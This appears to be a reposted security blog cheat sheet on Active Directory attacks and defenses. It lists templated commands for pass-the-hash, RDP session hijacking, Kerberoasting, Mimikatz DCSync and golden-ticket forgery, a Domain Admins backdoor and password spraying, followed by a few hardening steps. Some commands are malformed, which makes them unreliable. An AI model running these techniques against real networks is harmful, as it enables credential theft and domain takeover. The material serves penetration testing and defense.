Listen to this Post
Active Directory (AD) is the backbone of enterprise security, yet it remains a prime target for attackers. Whether you’re a penetration tester, red teamer, or defender, mastering AD security is crucial. Below is a comprehensive guide with practical commands, techniques, and defensive measures.
🔗 Reference: Active Directory Security Guide
You Should Know: AD Security Commands & Techniques
1. Enumeration – Finding AD Weaknesses
- PowerShell Command:
Get-ADUser -Filter -Properties | Select-Object Name, SamAccountName, UserPrincipalName, Enabled
- LDAP Query:
ldapsearch -x -h <DC_IP> -D "<user>@<domain>" -w "<password>" -b "dc=<domain>,dc=com" "(objectClass=user)"
- BloodHound (Tool for AD Mapping):
sudo neo4j start && bloodhound
2. Lateral Movement – Spreading Access
- Pass-the-Hash (PTH) Attack:
crackmapexec smb <target_IP> -u <user> -H <NTLM_hash> --local-auth
- RDP Hijacking:
tscon <session_ID> /dest:rdp-tcp<new_session>
3. Privilege Escalation – Gaining Admin Rights
- Kerberoasting Attack:
GetUserSPNs.py -request -dc-ip <DC_IP> <domain>/<user>
- DCSync Attack (Mimikatz):
lsadump::dcsync /domain:<domain> /user:Administrator
4. Persistence – Staying Undetected
- Golden Ticket Attack:
kerberos::golden /user:Administrator /domain:<domain> /sid:<SID> /krbtgt:<KRBTGT_Hash> /ptt
- Shadow Admin (Hidden Backdoor):
Add-ADGroupMember "Domain Admins" "<user>" -Verbose
5. Defense – Securing & Monitoring AD
- Detecting Anomalies with Windows Event Logs:
Get-WinEvent -LogName Security | Where-Object { $<em>.ID -eq 4624 -or $</em>.ID -eq 4672 } - Enabling LSA Protection (Against Mimikatz):
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
- Blocking NTLM (Prevent Relay Attacks):
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "NTLMMinServerSec" -Value 537395200
What Undercode Say
Active Directory remains a critical attack surface in enterprise networks. Attackers leverage misconfigurations, weak credentials, and excessive privileges to compromise domains. Defenders must:
– Monitor logs for suspicious logins (Event ID 4624, 4625).
– Disable legacy protocols (NTLM, SMBv1).
– Implement least privilege (Restrict Domain Admin access).
– Use tools like BloodHound to visualize attack paths.
Bonus Linux Commands for AD Testing:
Impacket (Python-based AD Exploitation) python3 GetADUsers.py -dc-ip <DC_IP> <domain>/<user> -all CrackMapExec (Network Exploitation) crackmapexec smb <IP_Range> -u <userlist> -p <passlist>
Expected Output: A hardened AD environment with reduced attack surface, continuous monitoring, and mitigated lateral movement risks.
🔗 Further Reading: Medium on AD Security
References:
Reported By: Alexrweyemamu Active – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
